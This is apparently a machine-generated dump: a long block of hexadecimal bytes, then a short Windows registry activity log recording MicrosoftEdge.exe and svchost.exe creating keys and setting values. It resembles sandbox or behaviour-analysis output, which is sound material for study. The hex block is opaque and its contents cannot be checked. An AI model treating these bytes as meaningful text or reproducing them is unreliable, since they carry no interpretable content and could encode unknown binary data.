100c1c7874101c485b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d0607101000001141d08157176121521251115a7bceeec7c7b5b5106050207069a9b01010000010100000101000001080b02093b3735311d100c1c78680c1c485f0b1c283e0a1c2e2ae8e6f6f4c4c2d2d0607118130a196d7d09197d6c08194d5307192d3206192b27f5f117040206343032d0cc2c0001010000d6ec3a00ecd63a00a118b90000000000010b0e040a3e32060a3834766900130a19fded09196d7c08197d6307192d3206192b27e510cc2c00020200004b763d00a9943d00b70eb900e8d53d002f123d00eed33d00d26bb9000000000001121b081327380c13415efcfaeae87877676656510e0b040f3b32060f3d397b7119120a187c680c184c5f0b182c3e0a184a46e4e2f2f060711310021260795b510a0a010b696200011c110c1d697f0b1d796e0a1d495d091d293c081d2f2be9e7f7f5d5d11e0b040f3b32060f3d397b90cc2c0001010000dd994400e7a34400eb52b90000000000110d160a1c786b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d06090cc2c0001010000266345007a3c460005bfba0000000000090f040206343032d0cc2c0001010000f4be4a00014a4b0001010000014a4b00010b08020a38343631080b02099b905251080b02097b7052411e0b040f3b32060f3d397b90cc2c0001010000e5ab4e00f5bb4e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c00010100009dd34e00b3fd4e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c00010100003d734e006d234e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c0001010000256a4f00337c4f00eb52b90000000000010e09060f6b63070f3b32060f3d397b71040702057175010118130a196d7b0f197d6a0e194d590d192d380c198b87f5e10b0e040a3e33070a3834767105050104666200193727091d79a0c41d29f7c31d1cbfbe0eeeec7c7b5b5000e052b200e0e505000118130a196d7f0b197d6e0a194d5d09192d3c08194b47f5e11d160a1c2820141caea7e5e3f3f1c1dfcfcd7d7c6c6b5b511c110c1d69790d1d79680c1d495f0b1d293e0a1d4f4be9e7f7f5d5d93c2c0913270d39131231300cfcfaeae878776766565000e052b20070710100111b0e040a3e33070a38347690cc2c0001010000aec769000c666a002298ba0000000000193c2f0a1642451116222410166460e2e0f0eececc7c7b6b8052b20038380000010704020674703229322c071a6e80f41a2ec7f31a1bf1f00b5b5000e052b20070770700010e09060f3b380c0f7d7a7877676656411e0b040f3b32060f3d397b90cc2c0001010000690b620072106200eb52b90000000000010e09060f6b6f0b0f3b3e0a0f7d797b7118130a196d790d197d680c194d5f0b192d3e0a196b67f5f117040206343032d0cc2c0001010000522371006918710078c2ba0000000000011d170b1c6863171c7872161c4841151c2820141c1d131215f5e00001141d0815617c081571630715213206152723f1e1151c0814706c0814405307142032061426226071060601074542001101170710928efcfadad8c8c676756564343000e0cc2c00010100004b3f7400453075003b81ba0000000000111e0b040f3b32060f3d397b90cc2c0001010000bac87200d0a27200eb52b90000000000111704020634307290cc2c0001010000ed94790003797a005fe5ba0000000000111b0e040a3e32060a38347690cc2c0001010000afd27d00c5b87d005fe5ba000000000001141c091561710515716004154157031521360215f5e00019061a050d0c898806e6e4c4c2525000e052b200000404002109220a28dc778320f45084186cf1851074e286083cb38720a080007bfb8000e8a940012121000020a080007bfb8000e8a940010116110617435f0b172521e3e1f1ef7f5134130615d1ce0a0d696d0905313c08502f7f0067187f003476430121210000502f7f0067187f0034764301190a120104a6a200e052b20040400000010b0e040a3e3e0a0a787476693420382a6b60141b7f77131723261213203dbcb8faf8e8e6d6d4c4c2525000e052b20050500000010e09060f6b75110f3b24100fddd97b693420584a6b60141b7f77131723261213405dbcb8faf8e8e6d6d4c4c2525000e052b200585800000115120614706307142032061426226061041d0815617e0a15716d0915213c08154743e110cc2c000101000018958d0065e88d0078c2ba0000000000010704020634303221051c0814706a0e1420380c146662e0feeeec7c90cc2c00020200009a0a9000e0709000912bba00000000005dcd9000ee7e9000ab11ba0000000000111b0e040a3e3c080a58547690cc2c000101000072e39100f1609100c47eba0000000000010f0c020e3c383a31191e06184c5307182c3206182a2674711e0b040f3b32060f3d397b90cc2c000101000061f49500bc299500dd67ba00000000000107040206343052410a110a1b7f680c1b2f3f0b1b2925e7e5f5f3c3c1d1cf7f90cc2c0001010000821e9c00b22e9c00f74dba000000000001161d0a1723231717a5a2e0feeeecdcdacac878776766564931220a1a2e2c181ae8e2e0feeeecdcdacac87877676656b052b20070700000193424091b4fc492192fba8c191a8b880ceeec7c7b6b6000e052b2004054140019283a0b1f4bc2941d2ba0961d1e8f8c10e2e0f0eececc7c7b6b6000e052b20060741400010b09030a626a0204a6a200111e0b040f3b33070f3d397b90cc2c0001010000fe58a60008afa7000eb5bb000000000001090a02089a9634293f2f091870660e14151f1e09e9e7777666653534545000e052b200d0d000000107040206141032310a08030b636d0507c5c20001090901086a6200111e0b040f3b32060f3d397b90cc2c000101000015beab0055feab00dd67ba000000000001050501048682000105050104060200011a13081b6f7d091b7f6c081b2f33071b292644590609060f6b6d090f3b3c080f3d397b90cc2c00010100009223b1009928b100269dbb009928b10009030e040a3e32060a38347690cc2c00010100006ddfb200a012b20060dbbb00a012b20001030301023230000105050104161200010100000000000001010000000000000000000018322a0000000000c88d44010000000000000000000000000000000002020000e0a54401084e470100000000000000000000000010100000e8b0590100000000ff000000ff0000001818000020092900000000000000000000000000000000001049580100000000ff000000ff00000018180000e0c929000000000000000000000000000000000018322a000000000050164701000000000000000000000000000000000303000070364701e0a54401084e470100000000000000000000000000000000000000003861580100000000ff000000ff0000001818000080a92900000000000000000000000000000000000000000000000000b8495ccd60000000e6a04701010100000303000003030000c88e4701d4924701e0a64701302b1b00f0e91900405b1b00edab4701f2b44701f6b0470100000101020242016d4a08006c6907071d7472071b6e73071b1f7000387f4601000000000000000002484b0100c0c00080c94801000000000000000096dc4b01488ac2000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d01000000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000c0c4573f09001570bbb9452b030d030d2d2d00030c63c2c0452b030d030d2a3417006500c6c4452b030d030d20230c086b00cdcf452b030d030d393b02030c086b004b0e171c0b097f011c4a08006c00cecf483a302f0519120d0e131622291d1f0c1535371708050d030e0965003b38740403021b071a1231578c8e513611372f0519120d0e13162025151561001819462211372f0519120d0e1316202515156100d5d545281d040d3a2f0519120d0e131664004949432f031c16262f0519120d0e131664002a284d3f150b2d2f0519120d0e1316645506161761011c4a08006c00181c5626182f221104010717262c011a111d0c741f1b562618202300041e0536331b0d171d06012b2b1a060b790026225626183a3f1b0601140d393b191e070a6400e2e6513b06090f0a080901213d1b0615041d0601282f051811177200b3b7573611213b06090f0a080901213d1b0615041d0601282f0518111772c6c746221137360700170b1a24221d0c06160073ceca5031171f04070f151135221d0c061600730006054a3a23221d0c0616001c1d3423041501071735221716160b1a74a9aa522410170b29351714091d1f0c0f0d06262c1a1b1a111772c7c646221137360700170b1a24221d0c0616003a2d64cbca46221137360700170b1a203c1a1704052d2d64008082452211272a0a071108393d04082432352f0509313d040865efed4b27071d1d080d05131f361f251a073c2d04056402014a3a372107171200021722221716160b1a746a68452211272715130601053927080938571e1c45221139220b1119092d290f0a08093257002521562618393b191e070a213d78f1f34b271a11171e030c080e01222a19061b3b1f251a077421255626183c33373b292f05092d2d0405011772b4b75133081a16203d1b0615041d06016e00080a452211382d12073137001d1d72008084573611382d12073137001d1d7200f2f2452b1a111731311b1d1d0a020d3f3606171d06016e003b384f2904171326311b1d1d0a020d3f3606171d06016e00d2d244210909111126311b1d1d0a020d3f3606171d06016eebe94b27071d1d080d05131f26311b1d1d0a020d3f3606171d06012f2f0a372319072d2c1a1b1a74d3d750381f322d00030c6300d5d150381f34221122370d191065d6d250381f20361122370d191065d4d050381f353417006568694734170029250b1013130b794c4e45221124221d0c22250016171600730040434f230e0528250b1013130b3c3d2f57001f1e443d111d24221d0c061600731d1f45221139220b1119092d290f0a0809203d2f5700191b45221139220b111909232f05092b2f0c08244100696a4e3819181d2b3b0d11313b383e0d01262b0913722025523e0d01262b0913263b223819181d2b3b0d1165d7d54a2d0411363417006500d3d14a2d0411312d00030c632f2c4f0f0e2c112327061b07093057003435472f070a272f031c16653938472f070a222f1b0107322f0509203d3941004948472f070a2a2b1d0c322f050924410c0f4a3a25370d050d272c0b0135310602656e6f46221135021350003e3c4522113b0a080e13500078794622113713192708096f8c8d462211372c02000c0f0a2825070b24418d8c462211372c02000c0f0a2825070b3257e1e0462211312b181f1b1d0103080b1a2727061b070914245700676647341700202b181f1b1d0103080b1a2727061b0709142457515345221124221d0c0616003b2d041170006b694522112727102c290f0a08096500fafb462211322f0509312d09156570724522112727061b0709332d0915325700dcde4a2d0411233a131f6500dad84a2d04112237242d00030c6394905736112727102c290f0a08096500343152251b1d11232f0509655d5c472a19061b2e2f0509273713000317017300a0a1462211372c011d1c030926135000b2b3462211372c011d1c030928220b0165007571573611322f0509353f06071a1117373d78005252432f031c162d290f0a080965333652251b1d11262c011d1c030932578f8f433117041511232f050932570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032907df2b4b22b00cd907df2b4b22b0000000000ff00000001010000020200002f0f2000000000000000000000000000ff000000fd020000ff000000f30c00000808000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000001000000000002000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000610301070103010f010301070103011f010301070103010f01037a0000000000410301070103010f010301070103011f010301070103010f01035a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000050005181810100000103060c080000000000000000000000a4a7030060e2fbfba321000000000000a679df0000000000a104a50000000000811e7f1cfc000000403efe7cfc000000a8ab0300c1627979832000000000000000000000000000000000000000000000817ffe000000000040befe0000000000b5b60300c1627979832000000000000000000000000000000000000000000000817ffe000000000041bffe0000000000b6b50300cf6d4646b81ae5474a4af95b00000000000000000000000000000000817ffe0000000000403edf5ffe00000051540500518b8484fa205f85b0b0e8320000000000000000000000000000000081520b063e19f900314fff7ffe00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000001000000000002000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000610301070103010f010301070103011f010301070103010f01037a0000000000410301070103010f010301070103011f010301070103010f01035a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c01fdf808101000001010000000000000101000000000000000000000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae5781810100000000000000000000000000000000000000000000000000000000000000000000000000000000000010485981810100000000000000000000000000000000000040a2e28081010000c023e380810100004098d8808101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090c554818101000050005181810100004343000000000000000000000000000000000000000000000000000001212000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022220000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000222200002020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fe010000ff000000a8f0598181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a81810100007f00000000000000d3f459818101000018736a818101000018736a818101000018736a818101000018736a818101000018736a818101000018736a818101000018736a81810100002e2e00002e2e0000fe01000000000000ff000000000000000101000000000000000000000000000075ed9800000000000000000000000000f4f5010000000000b87bc3808101000000000000000000002e117e173403053b3e0d00030c2333071024004000000000b87bc3808101000000000000000000002e117e17331d1b0615041d06012e33071024004000000000b87bc3808101000000000000000000002e117e173403053b3e1300131826310b122833090b09131c2833071024004000b87bc3808101000000000000000000002e117e17220d09153a360708092f00400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003025150001171600b8823b0101171600aeb81600ccf63b01aeb81600bdab1600e4de3b01bdab160091861700f8c23b0191861700c0d717000c373a01c0d717003f2718001c273a013f271800594118002c173a0159411800667e18003c073a01667e180088901800546f3a0190881800a9b1180068533a01a9b11800170e1900704b3a01170e1900465f190084bf3a01465f1900756c190084bf3a01756c1900a4bd190084bf3a01a4bd1900ccd5190084bf3a01ccd51900e6ff190084bf3a01e6ff1900edf4190098a33a01f0e9190022391b00a8933a01405b1b00869d1b0068533a01c0db1b00e1fa1b00b8833a01e4ff1b0018041c00286b420118041c00e9f51c00c4ff3a01ecf01c00ffe31c0068533a01001d1d009b861d00bc873a019c811d0009171e00ccf73a010c121e007d631e00d8e33a0188961e00d8c61e0068533a01d8c61e0003232000e4df3a010424200086a62000102c3d0188a820007d5c210038043d0180a12100d4f5210020614001d4f52100113322003c033e011c3e2200587a2200286b4201587a220091b3220068533a0194b62200c8ea220068533a01c8ea2200ddff220068533a01e0c22200082b230068533a01082b23001d3e230068533a012003230081a223002061400184a72300b497230068533a01b4972300c8eb230068533a01c8eb230011352400286b420114302400ddf9240090ac3d01e0c42400795c250068543d017c592500a0852500286b4201a0852500cbee2500286b4201cce925001b3d2600286b42011c3a26003315260068533a0134122600e0c626009ca03d010c2b27002700270068533a01381f27007d552800a8943d0180a82800cae228003c033e01cce42800163f29003c033e01200929005f762900286b420180a92900bf962900286b4201e0c92900153f2a00286b42012c062a006e442a00704d3c01705a2a0090ba2a00185d440190ba2a00b09a2a00185d4401c4ee2a008aa62c00b8843d01ac802c00d7fb2c00286b4201e0cc2c00dbf52e00ccf03d01dcf22e000e212f0068533a01103f2f00240b2f0068533a01240b2f0036192f0068533a0138172f0058772f0068533a0158772f0068472f0068533a0168472f0092bd2f00286b4201b09f2f0050613100e8d43d0150613100ddec31000c4d4001e0d1310005373200286b4201083a3200dfed3200ecd03d01f0c2320014273300003d3c0120133300380b330008353c0140733300417233000c313c015063330051623300102d3c01546733007340330068533a0174473300c1f23300286b4201c4f733007c4834003c033e017c483400bb8f340068533a01bc883400deea340068533a01e0d4340026133500286b4201281d35005f6a3500286b420160553500281f37001c213c01281f37007c4b3700704d3c017c4b3700d0e73700704d3c01d0e73700241c3800704d3c01241c38008bb338003c033e018cb43800033a390020614001506939008eb7390014293c01b48d39002a103a0038053c012c163a0078423a003c033e0188b23a00c8f23a00704d3c01c8f23a00fcc63a00506d3c0118233b00a5993c0020614001b4883c00201e3e007c413c01201e3e0069573e00286b42016c523e00d8e63e00704d3c01043b3f00c0804000043a3f01c080400021604100286b4201246541009ad84200bc813c019cde4200084b4300704d3c01084b430001454400dce13c010440440045014400d0ed3c01480c44006226440068533a01642044007e3a440068533a0180c44400b8fc440068533a01c0844400fbbf4400201e3f01fcb844009bdd4600447a3f019cda4600763e4800043a3f0188c04800c28a4800fcc13c01044d49004c054900f4c93c016029490083ca490068533a0184cd490094dd490068533a0198d14900e9a04900286b4201f4bd490082c84a00286b420198d24a00ace64a0068533a01ace64a00bcf64a0068533a01d09a4a00e0aa4a0068533a01e0aa4a00074c4b00744a3f0108434b00450e4b0094aa3f0148034b00a6ed4b00286b4201a8e34b00074b4c00286b420108444c005d114c0068533a01602c4c00d5994c00286b4201d8944c0068254d00704d3c0168254d00b0fd4d00286b4201cc814d00034d4e00286b4201206e4e007f314e00f4ca3f0180ce4e00c58b4e00d0ee3f01c8864e0007484f00ac923f0108474f00450a4f0018273e0148074f00154550009ca23f01184850003868500094aa3f01386850002d7c5100a49a3f013061510097c65100704d3c0198c95100d9885100286b4201dc8d510070225200704d3c01702252000f5c53003c033e0110435300491a530068533a014c1f53006e3d530068533a0170235300104555001c213c011045550065305500704d3c01683d5500bde85500704d3c01c095550015435600704d3c01184e560080d656003c033e0180d65600f8ae560020614001f8ae5600e7b05700546b3e01e8bf57004d1558003c033e015008580087df58004c733e0188d058000d5459006c533e011049590051085900286b4201540d5900aff55a0080bf3e01b8e25a005f045b00a09f3e01603b5b007e255b0078473e0180db5b00c69d5b0068533a01104c5c005e025c00704d3c01603c5c0080dc5c0068533a0180dc5c00a0fc5c0068533a01b4e85c00bde35e00b8873e01c09e5e00d08f5f00d0ef3e01d08f5f007c1d6100ecd33e017c1d610043216200206140014c2e620084e6620084c4410184e662009bff64003c033e019cf86400197c6500501041011c796500acc9650020614001acc965008ee967005818410190f76700452c690074344101482169006f06690068533a01701969002f456a000c4c4101305a6a00d7bb6c0030704101d8b46c004d206d00a8e8410164096d0089e46d0068533a018ce16d008fe16e00b8f8410198f66e002d426f0020614001305f6f004c236f0068533a0158376f0043337000f0b04101443470003f4e71000c4d4001403171007b0a7100d09041017c0d7100bccd7100704d3c01bccd71005022720020614001502272009fed72003c033e01a0d27200e597720068294001e89a72001665730034754001384b7300d1a475003c7d4001fc89750041377600704d3c014c3a760094e37700546b3e019ceb7700cdba7700286b4201d0a7770001797800286b4201047c78002a52780068533a012c5478004b32790038053c014c357900a7de7900286b4201ccb5790013697a008ccd4001146e7a0043397a0068533a01d0aa7a00463a7c0020614001700c7c00a6da7c0094aa3f01d0ac7c0078057d0068533a0178057d00e8957d00aced4001e8957d00502e7e00704d3c01502e7e0017687f00d091400118677f004a357f0068533a01502f7f0067187f003476430167187f001b9b8000440643011b9b80001c9c80006022430120a080007bfb8000e8a940017bfb800037b483000042430137b4830054d783002466430154d7830026a28400704d3c0128ac8400c642840070324301d054840066e3850080c2430168ed85007ffa850068533a018005850031b687008cce430134b387008f058a00c4864301901a8a0026ad8b00b4f6430128a38b0061ea8b0068533a0164ef8b00e66d8b00704d3c01e8638b007df18c0020614001800c8c00d05c8c00ecae4301d05c8c00870a8d00fcbe4301d05d8d008a048e000c4d40018c028e00018e8f0068533a01048b8f0063ec8f0068533a0164eb8f00db548f003c033e01dc538f0027b79000286b420134a4900018899100307342011889910057c691005010410158c991000a9892006c2f42010c9e92004cde9200286b42014cde920056c5930090d3420158cb9300c457930094aa3f01c45793001a8e94003c033e011c88940024b1950098db420144d19500d0459500a8eb4201d045950061f79600eca8450164f296006cf498001c5845016cf4980071e899003c78450174ed9900900a9a003c784501900a9a00029e9c005c18450104989c00f06c9c00d4974201f06c9c00d14e9f0004404501e07f9f008b2ea50080c445018c29a5002583a6003c033e013096a600b315a600704d3c01b412a6001dbaa7008cc845012087a70079dea700c4ff3a017cdba700e146a700b0f44501e443a7009d35a8003c033e01a008a800c76ea900b8fc4501d079a90040eaaa00d89c450140eaaa0060caaa0078473e0160caaa00f65caa00e0a44501f852aa0069c2ab00f4b045016cc7ab000da1ac00eca8450110bcac00ca66ac00704d3c0110bdad004be6ad00185d44014ce1ad006cc1ad0068533a01802dad00903dad0020654401d07dad00f75aad00185d4401f855ad00fe4eb000286d440100b1b1002e9fb10068533a013081b1004dfcb100286b420150e1b100cc7db1003c794401cc7db100eb5ab100286b4201ec5db100fd4cb10068533a0160d2b200ad1fb20064214401e052b200fd4fb20068533a0100b3b30059eab30088cd440170c3b300c172b30090d54401e053b30015adb80098dd44013088b800f74fb800a0e5440110a9b90012abb900c8f43d012099b900378eb900cc8f4201378eb90053eab900cc8f420153eab9008930b900605c3d018930b900a118b90088b43d01a118b900b70eb900cc8f4201b70eb900d26bb900cc8f4201d26bb900eb52b900cc8f4201eb52b90005bfba00cc8f420105bfba002298ba00cc8f42012298ba003b81ba00cc8f42013b81ba005fe5ba00cc8f42015fe5ba0078c2ba00cc8f420178c2ba00912bba00cc8f4201912bba00ab11ba00cc8f4201ab11ba00c47eba00cc8f4201c47eba00dd67ba00cc8f4201dd67ba00f74dba00cc8f4201f74dba000eb5bb00cc8f42010eb5bb00269dbb00cc8f4201269dbb0052e9bb00cc8f420160dbbb00803bbb00cc8f4201000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094dd49006029490084cd490094dd4900f4bd490094dd49004821690094dd490064096d007c0d7100403171004c1f530010435300eca549004c236f00305f6f00cc814d0068254d0094dd490094dd4900104959005008580098d149004c05490018485000a0fc5c0068ed85002c5478004c357900ccb57900d079a9004ce1ad0036360000474700004a4a00004e4e0000505000004e4e0000575700004e4e00005d5d00000b0b0000131300005959000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101181800001818008080000000000000000000000000000101020200003030008080000000000000000000000000000101090d04004848000060f091017d7c0100000000000000000000000000000000003c034715014c561317011a0601531a161f1e1707450b0d0c0b0d07095a1a7201126b151f075307150f0a050d03010b581a5e1c165418013307365d120016080f0e1559581501021d4e1a52071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e43584716074d0c0f070f031607223317011a0601531a161f1e171933072a001c48060706073d2708094f581501021d4e1f57071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e435845111c33072a0000001c4f160616071b1d0d4733072a00000000001c4e171404101607110134221b1f1f05090202164d33072a000000000000001c4e1714041016071101213d1d0616011d060122291313094c4c09131309511a46123a271819040e175507551c2822000616004e1a41070d1f1642070f1133072a00000000001c135d171404101607110134221b1f1f05090202164d33072a0000001c135c160616071b1d0d4733072a001c135b060706073d27080951330736134e120016080f0e154733070a0000000000000000000000000000000000000000000000000000000000000000000000c0c0000c0d0100882a323212121a1a62627a7a42424a4ab2b3bbbb8b8b93939b9bfbfbc3c3cbcb23232b2b333313131b1ba3a4acacb4b4bcbcf4f5fdfdc5c5cdcdd5d5dddd25252d2d35353d3d05050d0d15151d1d65656d6d75757d7d45454d4d55555d5da5a6aeaeb6b6bebe86868e8e96969e9ee6e6eeeef6f6fefec6c6ceced6d6dede26262e2e36363e3e06060e0e16161e1e66666e6e76767e7e46464e4e56565e5ea6a7afafb7b7bfbf87878f8f97979f9fe7e7efeff7f7ffffc7c7cfcfd7d7dfdf27272f2f37373f3f07070f0f17171f1f67676f6f77777f7f47474f4f57575f5fa7a8a0a0b8b8b0b08888808098989090e8e8e0e0f8f8f0f0c8c8c0c0787f4f4f5f5f5757af0000d0d0001011010000a0a8a8b0b0b8b8808088889898e0e0e8e8f0f0f8f8c0c0c8c8d0d028283838000008081010181860606868707078784040484850505858a0a1a9a9b1b1b9b98181898991919999e1e1e9e9f1f1f9f9797f47474f4f5757e7e8e0e0f8f8f0f0c8c8c0c0d8d8d0d02828202038383030080800001818101068686060787870704848404058585050a8a9a1a1b9b9b1b18989818199999191e9e9e1e1f9f9f1f1c9c9c1c1d9d9d1d1292921213939090901011919111169696161797971714949414159595151a9aaa2a2babab2b28a8a82829a9a9292eaeae2e2fafaf2f2cacac2c2dadad2d22a2a22223a3a32320a0a02021a1a12126a6a62627a7a72724a4a42425a5a5252aa0000e0e00070710100c86c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdcdcddddd2d2d3d3d0d0d1d1d6d6d7d7d4d4d5d5dadaebebe8e8e9e9eeeeefefececedede2e2e3e3e0e0e1e1e6e6e7e7e4e4e5e5eaeafbfbf8f8f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5fafa0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757aff0f0008484000008a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5a828f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5faf000101b4b5010000a0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757a7a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5aaaabbbbb8b8b9b9bebebfbfbcbcbdbdb2b2b3b3b0b0b1b1b6b6b7b7b4b4b5b5babacbcbc8c8c9c9cececfcfcccccdcdc2c2c3c3c0c0c1c1c6c6c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdad30310110100000882d05050d0da500005051015050000078da32357d7d5d5dbdbe9e9efefe2e2e06060e0e16164e4e5656b6b8b0b08888808098989090e8e8e0e0f8f8f0f0c0c0d8d8d0d0282820203838303008084040b8b99191c1c1a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 761cd6473d99d701 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 